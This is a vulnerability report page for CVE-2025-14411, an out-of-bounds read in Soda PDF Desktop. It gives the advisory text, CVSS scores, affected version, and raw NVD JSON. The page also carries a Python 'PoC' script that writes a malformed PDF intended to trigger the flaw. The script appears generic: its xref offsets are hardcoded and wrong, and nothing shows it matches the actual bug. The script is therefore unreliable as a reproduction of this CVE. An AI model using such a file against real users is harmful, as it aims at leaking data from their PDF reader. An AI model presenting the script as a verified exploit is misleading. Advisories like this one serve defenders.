Security Vulnerability Report
CVE-2025-14411 CVSS 5.5 MEDIUM

CVE-2025-14411

Published: 2025-12-23 22:15:48
Last Modified: 2026-01-21 20:34:08

Description

Soda PDF Desktop PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27140.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sodapdf:soda_pdf:14.0.509.23030:*:*:*:*:*:*:* - VULNERABLE
Soda PDF Desktop < latest version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-14411 PoC - Soda PDF Desktop PDF Parsing Out-Of-Bounds Read
Note: This PoC is for educational and security research purposes only.
"""

import struct
import sys


def create_malicious_pdf():
    """Generate a malicious PDF file that triggers OOB read"""
    # PDF header
    pdf_content = b'%PDF-1.7\n'
    pdf_content += b'%\xe2\xe3\xcf\xd3\n'

    # Object 1: Catalog
    pdf_content += b'1 0 obj\n'
    pdf_content += b'<< /Type /Catalog /Pages 2 0 R >>\n'
    pdf_content += b'endobj\n'

    # Object 2: Pages
    pdf_content += b'2 0 obj\n'
    pdf_content += b'<< /Type /Pages /Kids [3 0 R] /Count 1 >>\n'
    pdf_content += b'endobj\n'

    # Object 3: Page with crafted stream that triggers OOB read
    pdf_content += b'3 0 obj\n'
    pdf_content += b'<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >>\n'
    pdf_content += b'endobj\n'

    # Object 4: Malicious content stream with crafted length
    # The stream length is manipulated to trigger OOB read during parsing
    stream_data = b'\x00' * 100  # Padding data
    pdf_content += b'4 0 obj\n'
    pdf_content += b'<< /Length ' + str(len(stream_data) + 0x1000).encode() + b' /Filter /FlateDecode >>\n'
    pdf_content += b'stream\n'
    pdf_content += stream_data
    pdf_content += b'\nendstream\n'
    pdf_content += b'endobj\n'

    # Object 5: Additional crafted object that may trigger OOB
    pdf_content += b'5 0 obj\n'
    pdf_content += b'<< /Type /ObjStm /N 10 /First 0 /Length 0 >>\n'
    pdf_content += b'stream\n'
    pdf_content += b'endstream\n'
    pdf_content += b'endobj\n'

    # Cross-reference table
    xref_offset = len(pdf_content)
    pdf_content += b'xref\n'
    pdf_content += b'0 6\n'
    pdf_content += b'0000000000 65535 f \n'
    pdf_content += b'0000000009 00000 n \n'
    pdf_content += b'0000000058 00000 n \n'
    pdf_content += b'0000000115 00000 n \n'
    pdf_content += b'0000000200 00000 n \n'
    pdf_content += b'0000000300 00000 n \n'

    # Trailer
    pdf_content += b'trailer\n'
    pdf_content += b'<< /Size 6 /Root 1 0 R >>\n'
    pdf_content += b'startxref\n'
    pdf_content += str(xref_offset).encode() + b'\n'
    pdf_content += b'%%EOF\n'

    return pdf_content


if __name__ == '__main__':
    print('[+] Generating PoC for CVE-2025-14411')
    print('[+] Target: Soda PDF Desktop')
    print('[+] Vulnerability: Out-Of-Bounds Read in PDF parsing')

    pdf_data = create_malicious_pdf()

    output_file = 'CVE-2025-14411_poc.pdf'
    with open(output_file, 'wb') as f:
        f.write(pdf_data)

    print(f'[+] PoC file created: {output_file}')
    print('[+] Size:', len(pdf_data), 'bytes')
    print('[!] Note: This PoC triggers OOB read conditions in PDF parser')
```

References

https://www.zerodayinitiative.com/advisories/ZDI-25-1084/ (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14411", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:47.877", "lastModified": "2026-01-21T20:34:08.173", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soda PDF Desktop PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27140."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", 
"description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sodapdf:soda_pdf:14.0.509.23030:*:*:*:*:*:*:*", "matchCriteriaId": "ABC0E7B2-E242-4BD7-81E6-BA077750E564"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1084/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}